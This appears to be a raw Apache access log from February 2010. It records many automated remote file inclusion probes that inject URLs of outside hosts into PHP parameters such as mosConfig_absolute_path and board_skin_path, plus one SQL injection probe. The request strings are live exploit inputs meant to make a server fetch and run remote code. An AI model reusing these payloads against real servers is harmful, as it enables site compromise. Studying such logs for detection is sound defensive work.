74.205.120.218 - - [15/Feb/2010:04:30:28 -0500] "GET /logs/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:29 -0500] "GET /logs/access_log.Q110011800/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:30:41 -0500] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:30:43 -0500] "GET /?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:30:43 -0500] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:30:43 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:30:46 -0500] "GET /logs/access_log.Q109051600//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:30:47 -0500] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:30:47 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:50 -0500] "GET /logs/access_log.Q109122700%20%20/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:52 -0500] "GET /logs/access_log.Q109122700%20%20/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:57 -0500] "GET /logs/access_log.Q109122700/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.205.120.218 - - [15/Feb/2010:04:30:57 -0500] "GET /logs/access_log.Q109122700/////components/com_xfaq/xfaq.php?mosConfig_absolute_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:31:10 -0500] "GET /logs/access_log.Q109081300//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:31:19 -0500] "GET /?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:31:19 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 38402 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:31:22 -0500] "GET /logs/access_log.Q109081300//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
91.121.105.125 - - [15/Feb/2010:04:31:23 -0500] "GET /logs/access_log.Q109072900%20%20/?INCLUDE_FOLDER=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:49 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:49 -0500] "GET //write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:49 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:50 -0500] "GET //write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:50 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:50 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:50 -0500] "GET //write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:51 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:51 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:51 -0500] "GET //write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:51 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:51 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:04:31:57 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.141.196.78 - - [15/Feb/2010:04:31:58 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:58 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:58 -0500] "GET /logs/error_log.Q109120300/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:58 -0500] "GET /logs/access_log.Q110011600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:59 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:59 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:31:59 -0500] "GET /logs/error_log.Q109120300/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:00 -0500] "GET /logs/access_log.Q110011600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:01 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:01 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:01 -0500] "GET /logs/access_log.Q110011600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:02 -0500] "GET /logs/error_log.Q109120300/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:03 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:03 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:03 -0500] "GET /logs/error_log.Q109120300/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:05 -0500] "GET /logs/access_log.Q110011600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:09 -0500] "GET /index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:09 -0500] "GET /logs/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:09 -0500] "GET /logs/error_log.Q109120300/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:09 -0500] "GET /logs/access_log.Q110011600/index1.php?site=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:20 -0500] "GET /logs/access_log.Q110020800//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:20 -0500] "GET //write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:32:21 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
189.31.228.47 - - [15/Feb/2010:04:32:37 -0500] "GET /products.php?id=' HTTP/1.1" 404 210 "-" "libwww-perl/5.813"
125.141.91.138 - - [15/Feb/2010:04:32:41 -0500] "GET /logs/access_log.Q110021100%20%20///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
216.36.59.85 - - [15/Feb/2010:04:32:44 -0500] "GET /logs/access_log.Q109121400/forum.php?act=http://ricajupanu.go.ro/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.54.22.2 - - [15/Feb/2010:04:33:07 -0500] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 243 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
74.54.22.2 - - [15/Feb/2010:04:33:07 -0500] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.solutionexchange-un.net.in/fonts/test.pl?? HTTP/1.1" 404 248 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
218.38.136.126 - - [15/Feb/2010:04:33:25 -0500] "GET ///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
218.38.136.126 - - [15/Feb/2010:04:33:25 -0500] "GET /logs///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.38.136.126 - - [15/Feb/2010:04:33:25 -0500] "GET /logs/access_log.Q110021100///inc/formmail.inc.php?script_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:04:33:27 -0500] "GET //board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:04:33:27 -0500] "GET /logs//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:04:33:27 -0500] "GET /logs/access_log.Q110020800//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:04:33:27 -0500] "GET /logs/access_log.Q110020800//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
151.8.79.19 - - [15/Feb/2010:04:33:30 -0500] "GET //board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:04:33:34 -0500] "GET /logs/access_log.Q109121300//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:33:43 -0500] "GET /logs/access_log.Q110020300//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:33:47 -0500] "GET /logs/access_log.Q110020300//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:04:33:47 -0500] "GET /logs/access_log.Q110020700//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:33:48 -0500] "GET /logs/access_log.Q110020700//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:33:57 -0500] "GET /logs/access_log.Q110020300//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:00 -0500] "GET /logs/access_log.Q109071600///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:34:01 -0500] "GET /logs/access_log.Q110020300//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:34:05 -0500] "GET /logs/error_log.Q110020700//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:06 -0500] "GET /logs/access_log.Q109071600///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:10 -0500] "GET /logs/access_log.Q109071600///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:34:24 -0500] "GET /logs/access_log.Q110020300//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:44 -0500] "GET /logs/access_log.Q109070400///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:45 -0500] "GET /logs/access_log.Q109070400///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
208.87.240.120 - - [15/Feb/2010:04:34:48 -0500] "GET /logs/access_log.Q109070400///vwar/backup/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:34:57 -0500] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:34:57 -0500] "GET /logs/error_log.Q109120400%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:34:57 -0500] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
216.119.103.12 - - [15/Feb/2010:04:34:58 -0500] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.119.103.12 - - [15/Feb/2010:04:34:58 -0500] "GET /logs/access_log.Q110011500%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.119.103.12 - - [15/Feb/2010:04:34:58 -0500] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:03 -0500] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:03 -0500] "GET /logs/error_log.Q109120400%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:03 -0500] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:04 -0500] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:04 -0500] "GET /logs/error_log.Q109120400%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:04 -0500] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:05 -0500] "GET /logs/access_log.Q110020600%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:08 -0500] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:08 -0500] "GET /logs/error_log.Q109120400%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:09 -0500] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:10 -0500] "GET /logs/access_log.Q110020600%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:11 -0500] "GET /logs/access_log.Q110020600%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:15 -0500] "GET /main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:15 -0500] "GET /logs/error_log.Q109120400%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:18 -0500] "GET /logs/access_log.Q110020600%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:18 -0500] "GET /logs/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
125.141.196.78 - - [15/Feb/2010:04:35:22 -0500] "GET /logs/access_log.Q110020600%20%20/main.php?link=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.139.19 - - [15/Feb/2010:04:35:38 -0500] "GET /logs/access_log.Q110012400//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.17.139.19 - - [15/Feb/2010:04:35:38 -0500] "GET //write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.17.139.19 - - [15/Feb/2010:04:35:38 -0500] "GET /logs//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.17.139.19 - - [15/Feb/2010:04:35:44 -0500] "GET /logs//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 220 "-" "Mozilla/3.0 (OS/2; U)"
85.17.139.19 - - [15/Feb/2010:04:35:44 -0500] "GET /logs/access_log.Q110012400//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 242 "-" "Mozilla/3.0 (OS/2; U)"
85.17.139.19 - - [15/Feb/2010:04:35:44 -0500] "GET //write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 215 "-" "Mozilla/3.0 (OS/2; U)"
85.17.139.19 - - [15/Feb/2010:04:36:03 -0500] "GET /logs/access_log.Q110011200//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
85.17.139.19 - - [15/Feb/2010:04:36:05 -0500] "GET /logs/access_log.Q110011200//write_update.php?board_skin_path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 242 "-" "Mozilla/3.0 (OS/2; U)"
208.70.79.113 - - [15/Feb/2010:04:36:14 -0500] "GET /logs//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:04:36:14 -0500] "GET //appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
208.70.79.113 - - [15/Feb/2010:04:36:14 -0500] "GET /logs/access_log.Q109120200%20%20//appserv/main.php?appserv_root=http://qqe.ru/forum/id1.txt??%20? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:04:36:31 -0500] "GET /images/Office%20Supply/ HTTP/1.0" 200 3623 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [15/Feb/2010:04:36:35 -0500] "GET /logs/access_log.Q109070300//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:36:35 -0500] "GET /logs/access_log.Q109071200//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:36:49 -0500] "GET /logs/access_log.Q110020700//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:04:36:49 -0500] "GET /logs/error_log.Q110020700//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:04:36:51 -0500] "GET //board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
